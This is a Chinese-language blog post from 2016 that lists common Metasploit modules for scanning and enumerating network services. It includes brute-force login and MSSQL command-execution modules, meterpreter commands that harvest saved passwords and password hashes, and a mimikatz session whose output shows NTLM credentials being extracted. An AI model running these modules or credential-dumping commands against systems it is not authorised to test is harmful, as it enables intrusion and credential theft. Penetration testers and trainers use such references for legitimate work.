2016-07-24 16:52:48

metasploit 常用模块

爬虫:
auxiliary/crawler/msfcrawler
判断存活主机:
meterpreter > run arp_scanner -r
寻找局域网里面匿名ftp
 auxiliary/scanner/ftp/anonymous 
寻找putty保存的密码
meterpreter > run enum_putty 
寻找ie保存的密码
meterpreter > run post/windows/gather/enum_ie
windows的口令:
meterpreter > run windows/gather/smart_hashdump
得到本地路由:
meterpreter > run get_local_subnets
暴力破解:
use auxiliary/scanner/mssql/mssql_login
mssql执行cmd:
use auxiliary/admin/mssql/mssql_exec
端口扫描
auxiliary/scanner/portscan
scanner/portscan/ack
ACK防火墙扫描
scanner/portscan/ftpbounce
FTP跳端口扫描
scanner/portscan/syn
SYN端口扫描
scanner/portscan/tcp
TCP端口扫描
scanner/portscan/xmas
TCP”XMas”端口扫描
smb
扫描
smb
枚举
auxiliary/scanner/smb/smb_enumusers
返回DCERPC信息
auxiliary/scanner/smb/pipe_dcerpc_auditor
扫描SMB2协议
auxiliary/scanner/smb/smb2
扫描smb共享文件
auxiliary/scanner/smb/smb_enumshares
枚举系统上的用户
auxiliary/scanner/smb/smb_enumusers
SMB登录
auxiliary/scanner/smb/smb_login
SMB登录
use windows/smb/psexec
(通过md5值登录) 扫描组的用户
auxiliary/scanner/smb/smb_lookupsid
扫描系统版本
auxiliary/scanner/smb/smb_version
mssql
扫描(端口
tcp1433udp1434
)
admin/mssql/mssql_enum
MSSQL枚举
admin/mssql/mssql_exec
MSSQL执行命令
admin/mssql/mssql_sql
MSSQL查询
scanner/mssql/mssql_login
MSSQL登陆工具
scanner/mssql/mssql_ping
测试MSSQL的存在和信息 另外还有一个
mssql_payload
的模块 利用使用的
smtp
扫描
smtp
枚举
auxiliary/scanner/smtp/smtp_enum
扫描
smtp
版本
auxiliary/scanner/smtp/smtp_version
snmp
扫描 通过
snmp
扫描设备
auxiliary/scanner/snmp/community
ssh
扫描
ssh
登录
auxiliary/scanner/ssh/ssh_login
ssh
公共密钥认证登录
auxiliary/scanner/ssh/ssh_login_pubkey
扫描
ssh
版本测试
auxiliary/scanner/ssh/ssh_version
telnet
扫描
telnet
登录
auxiliary/scanner/telnet/telnet_login
扫描
telnet
版本
auxiliary/scanner/telnet/telnet_version
tftp
扫描 扫描
tftp
的文件
auxiliary/scanner/tftp/tftpbrute
ftp
版本扫描
scanner/ftp/anonymous
ARP
扫描
auxiliary/scanner/discovery/arp_sweep
扫描
UDP
服务的主机
auxiliary/scanner/discovery/udp_probe
检测常用的
UDP
服务
auxiliary/scanner/discovery/udp_sweep
sniffer
密码
auxiliary/sniffer/psnuffle
snmp
扫描
scanner/snmp/community
vnc
扫描无认证扫描
scanner/vnc/vnc_none_auth
metasploit mimikatz 抓取密码
meterpreter > load mimikatz   //加载法国神器
Loading extension mimikatz...success.
meterpreter > msv
[!] Not currently running as SYSTEM
[*] Attempting to getprivs
[+] Got SeDebugPrivilege
[*] Retrieving msv credentials
msv credentials
===============
AuthID   Package    Domain           User              Password
------   -------    ------           ----              --------
0;62271  NTLM       K8ANTI-B2B9B81C  Administrator     lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE   lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
0;53697  NTLM                                          n.s. (Credentials KO)
0;999    NTLM       WORKGROUP        K8ANTI-B2B9B81C$  n.s. (Credentials KO)
meterpreter > kerberos
[!] Not currently running as SYSTEM
[*] Attempting to getprivs
[+] Got SeDebugPrivilege
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID   Package    Domain           User              Password
------   -------    ------           ----              --------
0;62271  NTLM       K8ANTI-B2B9B81C  Administrator     
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE     
0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE   
0;53697  NTLM                                          
0;999    NTLM       WORKGROUP        K8ANTI-B2B9B81C$  
meterpreter >

发表回复